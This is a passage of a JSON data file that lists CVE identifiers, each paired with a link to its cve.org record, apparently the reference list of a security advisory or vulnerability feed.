"url": "https://www.cve.org/CVERecord?id=CVE-2023-54096"
},
{
"name": "CVE-2025-39913",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39913"
},
{
"name": "CVE-2026-23064",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23064"
},
{
"name": "CVE-2025-71098",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71098"
},
{
"name": "CVE-2025-40251",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40251"
},
{
"name": "CVE-2025-71078",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71078"
},
{
"name": "CVE-2025-40355",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40355"
},
{
"name": "CVE-2023-54283",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54283"
},
{
"name": "CVE-2023-54049",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54049"
},
{
"name": "CVE-2025-71083",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71083"
},
{
"name": "CVE-2023-54066",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54066"
},
{
"name": "CVE-2026-23061",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23061"
},
{
"name": "CVE-2023-54117",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54117"
},
{
"name": "CVE-2023-53999",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53999"
},
{
"name": "CVE-2023-54038",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54038"
},
{
"name": "CVE-2025-68813",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68813"
},
{
"name": "CVE-2023-54315",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54315"
},
{
"name": "CVE-2026-23135",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23135"
},
{
"name": "CVE-2025-39689",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39689"
},
{
"name": "CVE-2025-68365",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68365"
},
{
"name": "CVE-2023-54211",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54211"
},
{
"name": "CVE-2023-54251",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54251"
},
{
"name": "CVE-2026-23119",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23119"
},
{
"name": "CVE-2025-71085",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71085"
},
{
"name": "CVE-2023-54156",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54156"
},
{
"name": "CVE-2026-23173",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23173"
},
{
"name": "CVE-2026-23268",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23268"
},
{
"name": "CVE-2023-53750",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53750"
},
{
"name": "CVE-2025-40347",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40347"
},
{
"name": "CVE-2025-71154",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71154"
},
{
"name": "CVE-2023-54037",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54037"
},
{
"name": "CVE-2023-53815",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53815"
},
{
"name": "CVE-2026-23222",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23222"
},
{
"name": "CVE-2025-68257",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68257"
},
{
"name": "CVE-2025-71084",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71084"
},
{
"name": "CVE-2023-54031",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54031"
},
{
"name": "CVE-2026-23094",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23094"
},
{
"name": "CVE-2026-23049",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23049"
},
{
"name": "CVE-2025-40190",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40190"
},
{
"name": "CVE-2022-50756",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50756"
},
{
"name": "CVE-2023-53989",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53989"
},
{
"name": "CVE-2025-68347",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68347"
},
{
"name": "CVE-2025-68235",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68235"
},
{
"name": "CVE-2025-68770",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68770"
},
{
"name": "CVE-2026-23229",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23229"
},
{
"name": "CVE-2025-40202",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40202"
},
{
"name": "CVE-2025-40311",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40311"
},
{
"name": "CVE-2025-68814",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68814"
},
{
"name": "CVE-2023-54254",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54254"
},
{
"name": "CVE-2025-71081",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71081"
},
{
"name": "CVE-2023-54312",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54312"
},
{
"name": "CVE-2023-54094",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54094"
},
{
"name": "CVE-2026-23101",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23101"
},
{
"name": "CVE-2026-23099",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23099"
},
{
"name": "CVE-2025-40167",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40167"
},
{
"name": "CVE-2025-38159",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38159"
},
{
"name": "CVE-2023-53846",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53846"
},
{
"name": "CVE-2023-53792",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53792"
},
{
"name": "CVE-2023-54164",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54164"
},
{
"name": "CVE-2025-40256",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40256"
},
{
"name": "CVE-2026-22989",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22989"
},
{
"name": "CVE-2026-23085",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23085"
},
{
"name": "CVE-2025-40360",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40360"
},
{
"name": "CVE-2026-23209",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23209"
},
{
"name": "CVE-2025-71136",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71136"
},
{
"name": "CVE-2025-68354",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68354"
},
{
"name": "CVE-2025-68801",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68801"
},
{
"name": "CVE-2026-23150",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23150"
},
{
"name": "CVE-2023-54316",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54316"
},
{
"name": "CVE-2025-40097",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40097"
},
{
"name": "CVE-2025-68258",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68258"
},
{
"name": "CVE-2023-54089",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54089"
},
{
"name": "CVE-2026-23163",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23163"
},
{
"name": "CVE-2023-54016",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54016"
},
{
"name": "CVE-2025-71235",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71235"
},
{
"name": "CVE-2023-54035",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54035"
},
{
"name": "CVE-2025-40322",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40322"
},
{
"name": "CVE-2026-23057",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23057"
},
{
"name": "CVE-2025-68209",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68209"
},
{
"name": "CVE-2025-71138",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71138"
},
{
"name": "CVE-2025-40233",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40233"
},
{
"name": "CVE-2023-54322",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54322"
},
{
"name": "CVE-2023-54155",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54155"
},
{
"name": "CVE-2023-54088",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54088"
},
{
"name": "CVE-2026-23166",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23166"
},
{
"name": "CVE-2025-40271",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40271"
},
{
"name": "CVE-2023-54276",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54276"
},
{
"name": "CVE-2023-42752",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-42752"
},
{
"name": "CVE-2026-22991",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22991"
},
{
"name": "CVE-2023-54048",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54048"
},
{
"name": "CVE-2023-54278",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54278"
},
{
"name": "CVE-2023-54215",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54215"
},
{
"name": "CVE-2025-68308",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68308"
},
{
"name": "CVE-2023-53777",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53777"
},
{
"name": "CVE-2023-54133",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54133"
},
{
"name": "CVE-2025-40242",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40242"
},
{
"name": "CVE-2026-23116",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23116"
},
{
"name": "CVE-2023-54148",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54148"
},
{
"name": "CVE-2025-68190",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68190"
},
{
"name": "CVE-2023-54064",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54064"
},
{
"name": "CVE-2023-54153",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54153"
},
{
"name": "CVE-2026-23207",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23207"
},
{
"name": "CVE-2025-40252",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40252"
},
{
"name": "CVE-2025-71200",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71200"
},
{
"name": "CVE-2023-53791",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53791"
},
{
"name": "CVE-2025-68218",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68218"
},
{
"name": "CVE-2023-53848",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53848"
},
{
"name": "CVE-2025-68255",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68255"
},
{
"name": "CVE-2023-54081",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54081"
},
{
"name": "CVE-2023-53828",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53828"
},
{
"name": "CVE-2025-40024",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40024"
},
{
"name": "CVE-2026-23172",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23172"
},
{
"name": "CVE-2025-40238",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40238"
},
{
"name": "CVE-2023-54185",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54185"
},
{
"name": "CVE-2025-40277",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40277"
},
{
"name": "CVE-2025-37813",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37813"
},
{
"name": "CVE-2025-40106",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40106"
},
{
"name": "CVE-2025-68174",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68174"
},
{
"name": "CVE-2025-40272",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40272"
},
{
"name": "CVE-2026-23133",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23133"
},
{
"name": "CVE-2025-71093",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71093"
},
{
"name": "CVE-2026-23131",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23131"
},
{
"name": "CVE-2026-23170",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23170"
},
{
"name": "CVE-2025-68759",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68759"
},
{
"name": "CVE-2023-53834",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53834"
},
{
"name": "CVE-2026-23204",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23204"
},
{
"name": "CVE-2025-71188",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71188"
},
{
"name": "CVE-2025-40345",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40345"
},
{
"name": "CVE-2023-54170",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54170"
},
{
"name": "CVE-2026-23125",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23125"
},
{
"name": "CVE-2023-53781",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53781"
},
{
"name": "CVE-2025-40033",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40033"
},
{
"name": "CVE-2022-50453",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50453"
},
{
"name": "CVE-2024-42103",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42103"
},
{
"name": "CVE-2025-68733",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68733"
},
{
"name": "CVE-2026-23005",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23005"
},
{
"name": "CVE-2026-23214",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23214"
},
{
"name": "CVE-2025-7709",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-7709"
},
{
"name": "CVE-2025-68188",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68188"
},
{
"name": "CVE-2025-40269",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40269"
},
{
"name": "CVE-2025-68335",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68335"
},
{
"name": "CVE-2025-71079",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71079"
},
{
"name": "CVE-2023-54223",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54223"
},
{
"name": "CVE-2025-37861",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37861"
},
{
"name": "CVE-2026-23178",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23178"
},
{
"name": "CVE-2026-22997",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22997"
},
{
"name": "CVE-2025-39977",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39977"
},
{
"name": "CVE-2023-54045",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54045"
},
{
"name": "CVE-2025-68330",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68330"
},
{
"name": "CVE-2023-54101",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54101"
},
{
"name": "CVE-2025-71196",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71196"
},
{
"name": "CVE-2023-54179",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54179"
},
{
"name": "CVE-2025-68180",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68180"
},
{
"name": "CVE-2023-54289",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54289"
},
{
"name": "CVE-2023-54177",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54177"
},
{
"name": "CVE-2026-23191",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23191"
},
{
"name": "CVE-2026-23078",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23078"
},
{
"name": "CVE-2025-68201",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68201"
},
{
"name": "CVE-2025-40289",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40289"
},
{
"name": "CVE-2026-23169",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23169"
},
{
"name": "CVE-2025-68768",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68768"
},
{
"name": "CVE-2025-68785",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68785"
},
{
"name": "CVE-2025-71130",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71130"
},
{
"name": "CVE-2023-54013",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54013"
},
{
"name": "CVE-2025-68808",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68808"
},
{
"name": "CVE-2024-27005",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27005"
},
{
"name": "CVE-2025-68223",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68223"
},
{
"name": "CVE-2025-68783",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68783"
},
{
"name": "CVE-2025-40292",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40292"
},
{
"name": "CVE-2025-71147",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71147"
},
{
"name": "CVE-2023-54093",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54093"
},
{
"name": "CVE-2023-53839",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53839"
},
{
"name": "CVE-2023-53752",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53752"
},
{
"name": "CVE-2023-53802",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53802"
},
{
"name": "CVE-2025-38224",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38224"
},
{
"name": "CVE-2025-68724",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68724"
},
{
"name": "CVE-2023-54318",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54318"
},
{
"name": "CVE-2026-23074",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23074"
},
{
"name": "CVE-2025-71126",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71126"
},
{
"name": "CVE-2025-71199",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71199"
},
{
"name": "CVE-2025-68252",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68252"
},
{
"name": "CVE-2023-54166",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54166"
},
{
"name": "CVE-2025-40274",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40274"
},
{
"name": "CVE-2025-68797",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68797"
},
{
"name": "CVE-2023-54136",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54136"
},
{
"name": "CVE-2023-54225",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54225"
},
{
"name": "CVE-2025-40220",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40220"
},
{
"name": "CVE-2025-68237",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68237"
},
{
"name": "CVE-2023-54194",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54194"
},
{
"name": "CVE-2025-40257",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40257"
},
{
"name": "CVE-2025-68259",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68259"
},
{
"name": "CVE-2025-71125",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71125"
},
{
"name": "CVE-2026-23006",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23006"
},
{
"name": "CVE-2025-71108",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71108"
},
{
"name": "CVE-2025-68789",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68789"
},
{
"name": "CVE-2025-68312",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68312"
},
{
"name": "CVE-2023-53843",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53843"
},
{
"name": "CVE-2025-68284",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68284"
},
{
"name": "CVE-2025-68194",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68194"
},
{
"name": "CVE-2025-38379",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38379"
},
{
"name": "CVE-2025-71195",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71195"
},
{
"name": "CVE-2025-40006",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40006"
},
{
"name": "CVE-2026-23083",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23083"
},
{
"name": "CVE-2026-23088",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23088"
},
{
"name": "CVE-2023-53844",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53844"
},
{
"name": "CVE-2025-68183",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68183"
},
{
"name": "CVE-2025-40263",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40263"
},
{
"name": "CVE-2023-54026",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54026"
},
{
"name": "CVE-2026-23108",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23108"
},
{
"name": "CVE-2025-68244",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68244"
},
{
"name": "CVE-2025-40231",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40231"
},
{
"name": "CVE-2025-40278",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40278"
},
{
"name": "CVE-2025-71194",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71194"
},
{
"name": "CVE-2025-40342",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40342"
},
{
"name": "CVE-2026-23023",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23023"
},
{
"name": "CVE-2023-53858",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53858"
},
{
"name": "CVE-2023-53992",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53992"
},
{
"name": "CVE-2026-22999",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22999"
},
{
"name": "CVE-2023-54266",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54266"
},
{
"name": "CVE-2025-71082",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71082"
},
{
"name": "CVE-2025-68222",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68222"
},
{
"name": "CVE-2026-23068",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23068"
},
{
"name": "CVE-2025-68765",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68765"
},
{
"name": "CVE-2023-53825",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53825"
},
{
"name": "CVE-2026-23089",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23089"
},
{
"name": "CVE-2025-71132",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71132"
},
{
"name": "CVE-2025-71225",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71225"
},
{
"name": "CVE-2023-54072",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54072"
},
{
"name": "CVE-2025-38322",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38322"
},
{
"name": "CVE-2026-23071",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23071"
},
{
"name": "CVE-2023-54134",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54134"
},
{
"name": "CVE-2026-23056",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23056"
},
{
"name": "CVE-2023-54184",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54184"
},
{
"name": "CVE-2025-71077",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71077"
},
{
"name": "CVE-2023-54291",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54291"
},
{
"name": "CVE-2025-40279",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40279"
},
{
"name": "CVE-2023-53865",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53865"
},
{
"name": "CVE-2025-68328",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68328"
},
{
"name": "CVE-2025-40201",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40201"
},
{
"name": "CVE-2026-23063",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23063"
},
{
"name": "CVE-2023-53823",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53823"
},
{
"name": "CVE-2026-23073",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23073"
},
{
"name": "CVE-2023-54023",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54023"
},
{
"name": "CVE-2025-71114",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71114"
},
{
"name": "CVE-2026-23058",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23058"
},
{
"name": "CVE-2025-68744",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68744"
},
{
"name": "CVE-2025-71182",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71182"
},
{
"name": "CVE-2023-54241",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54241"
},
{
"name": "CVE-2025-68320",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68320"
},
{
"name": "CVE-2026-23038",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23038"
},
{
"name": "CVE-2023-54017",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54017"
},
{
"name": "CVE-2023-53257",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53257"
},
{
"name": "CVE-2026-22990",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22990"
},
{
"name": "CVE-2023-53787",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53787"
},
{
"name": "CVE-2026-23000",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23000"
},
{
"name": "CVE-2025-68172",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68172"
},
{
"name": "CVE-2026-23176",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23176"
},
{
"name": "CVE-2025-39998",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39998"
},
{
"name": "CVE-2024-53149",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-53149"
},
{
"name": "CVE-2025-40338",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40338"
},
{
"name": "CVE-2026-23026",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23026"
},
{
"name": "CVE-2025-40134",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40134"
},
{
"name": "CVE-2026-23128",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23128"
},
{
"name": "CVE-2025-68325",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68325"
},
{
"name": "CVE-2025-71190",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71190"
},
{
"name": "CVE-2023-54154",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54154"
},
{
"name": "CVE-2025-71089",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71089"
},
{
"name": "CVE-2023-54141",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54141"
},
{
"name": "CVE-2023-53766",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53766"
},
{
"name": "CVE-2026-23107",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23107"
},
{
"name": "CVE-2025-68296",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68296"
},
{
"name": "CVE-2023-53785",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53785"
},
{
"name": "CVE-2025-40328",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40328"
},
{
"name": "CVE-2025-68332",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68332"
},
{
"name": "CVE-2023-54263",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54263"
},
{
"name": "CVE-2025-71104",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71104"
},
{
"name": "CVE-2026-22978",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22978"
},
{
"name": "CVE-2025-40283",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40283"
},
{
"name": "CVE-2025-40324",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40324"
},
{
"name": "CVE-2023-54181",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54181"
},
{
"name": "CVE-2025-68378",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68378"
},
{
"name": "CVE-2026-23146",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23146"
},
{
"name": "CVE-2023-53795",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53795"
},
{
"name": "CVE-2026-23037",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23037"
},
{
"name": "CVE-2025-40250",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40250"
},
{
"name": "CVE-2025-40264",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40264"
},
{
"name": "CVE-2025-38728",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38728"
},
{
"name": "CVE-2026-23001",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23001"
},
{
"name": "CVE-2025-68367",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68367"
},
{
"name": "CVE-2025-71224",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71224"
},
{
"name": "CVE-2025-68820",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68820"
},
{
"name": "CVE-2025-40321",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40321"
},
{
"name": "CVE-2023-54207",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54207"
},
{
"name": "CVE-2025-68249",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68249"
},
{
"name": "CVE-2025-68740",
